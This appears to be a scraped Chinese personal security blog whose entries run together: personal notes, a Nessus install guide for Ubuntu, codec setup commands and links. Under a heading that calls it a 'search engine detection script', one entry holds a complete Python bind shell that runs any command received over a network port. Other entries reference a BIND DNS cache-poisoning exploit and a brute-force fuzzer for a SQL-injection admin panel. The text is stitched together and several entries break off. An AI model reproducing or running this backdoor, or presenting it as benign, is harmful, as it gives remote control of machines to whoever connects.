demonalex的狂人日记

谢谢同事小钟的指导，在这里。

很久就没割接了，昨天晚上做了一次，感谢同事小钟的指导，让我学习了一种更好代替NETSCREEN MIP的NAT方式（稍后付上文档）；今天早上感冒，口咙疼，，，最后是药房后确认有发烧~昏。。。这两天的感觉真不好~~~

搜索引擎检测脚本:

谢谢Jetty的提醒，还修复了一些bug，在这里：

www.i170.com/Attach/89547786-C0CE-4AFC-99BF-71F6093574EB 

#!/usr/bin/python
#code by demonalex@163.com
import socket;
import os;

address=raw_input("Server Address:");
print "Repeat: Server Address:",address,"!";
port=raw_input("Port:");
print "Repeat: Port:",port,"!";

HOST=address;
PORT=int(port);

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,6);
s.bind((HOST,PORT));
s.listen(1);
conn, addr = s.accept();
#print "Connect by ",addr,"!";
while(1):
    conn.send("(");
    conn.send(os.getcwd());
    conn.send(")command:");
    data=conn.recv(1024);
    if not data: break;
    #print data,":",len(data);
    if (data[0:3]=='cd '):
        curr_dir=data[3:].strip();
        os.chdir(curr_dir);
        continue;
    if ((data[1]==':')and(len(data)==3)):
        curr_dir=data.strip();
        os.chdir(curr_dir);
        continue;
    if (data=="exit\n"):
        conn.send("bye!\n");
        break;
    result=os.popen(data).read();
    conn.send(result);
conn.close;
s.close;

demonalex(17627441) 02:52:57
离别总是令人伤心的。。。唉。。。
demonalex(17627441) 02:54:06
有志友、同志、老师要离我们而去，想起那些一起奋斗的日子。。。
demonalex(17627441) 02:55:05
发发牢骚，表示对他们的尊敬与尊重。。。

LOG之，希望他们前程似锦~：）...

Ubuntu下安装nessus
writer: demonalex[at]dark2s[dot]org


｛运行环境｝
操作系统： Ubuntu 8.04桌面版（2.6.24-16-generic #1 SMP）
nessus： version 2.2.9

｛安装过程｝
root@demonalex-laptop:~# apt-get update
root@demonalex-laptop:~# apt-get -y install nessus nessusd nessus-plugins

｛配置过程｝
安装完成后通过nessus-adduser添加用户：
root@demonalex-laptop:~# nessus-adduser
Using /var/tmp as a temporary file holder

Add a new nessusd user
----------------------


Login : admin                              <--输入新建用户名
Authentication (pass/cert) [pass] :        <--直接回车（通过密码认证）
Login password :                           <--输入密码
Login password (again) :                   <--再次输入密码

User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that admin has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser(8) man page for the rules syntax

Enter the rules for this user, and hit ctrl-D once you are done :
(the user can have an empty rules set)           <--按Ctrl+D继续


Login             : admin
Password          : ***********
DN                :
Rules             :


Is that ok ? (y/n) [y]                           <--直接回车（确认添加操作）
user added.
root@demonalex-laptop:/usr/bin# nessus-fetch --register 你的序列号

｛升级}
root@demonalex-laptop:~# nessus-update-plugins

{运行｝
首先运行服务端：
root@demonalex-laptop:~# nessusd -D
然后进入桌面，选择运行Panel上的“Application->Internet->Nessus”，在弹出的nessus GUI客户端
的“Nessusd Host”分页中输入帐号与密码，然后按“Log in”按钮，待登录成功后将自动跳到“Plugins”
分页，选择要扫描的插件，然后手工进入“Target”分页，输入扫描目标IP地址，最后“Start the scan”
按钮，待扫描完成后就可以看到报告窗口了。

运行结果：

另外，会在同一目录下生成uselog.txt的日志文件．继承原来的get系列程序，但这次是＂开源＂，哈哈：Ｄ，因为还是很烂的缘故，希望各位大侠帮忙改改：Ｐ，代码与测试素材的下载地址在这里：www.i170.com/Attach/39450C6D-8D05-4493-91B0-E2FC48458768

，不想下载的话可以直接看下面的代码：

#BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)

#http://www.milw0rm.com/exploits/6123

没有到处跑，只是和磁力在酒店附近溜达~酒店附近很个叫元帅庙的道教圣地：留意看一下，其实就在一家餐馆的旁边，不留意还不知道。。。

http://security.ctocio.com.cn/securitycomment/122/8210122.shtml

wiki.ubuntu.org.cn/Apt-get%E4%BD%BF%E7%94%A8%E6...

forum.ubuntu.com.cn/viewtopic.php?t=65707&highl...

#vi /etc/apt/sources.list

加入：

deb http://www.debian-multimedia.org etch main
deb http://www.debian-multimedia.org testing main

[:wq]

#apt-get update

#apt-get install totem-xine
#apt-get install w32codecs
#apt-get install libxine1-ffmpeg
#apt-get install alsa-oss
#apt-get install realplayer

http://www.venustech.com.cn/Case/183/121.Html

祝愿天下的父亲父亲节快乐~

希望天堂的父亲也快乐，回想起一年前的父亲节，父亲一直在病床上渡过，而我却什么都做不了...下周因为工作的关系，周末可能要加班，不能再去看父亲了，希望他能理解，，，，爸爸，下周再来看您了^_^

弄了个暴力破解neeao的防范SQL注入管理界面的WVS4 FUZZER脚本（不要忘了改目标IP地址），在这里，还是很暴力：）

截图：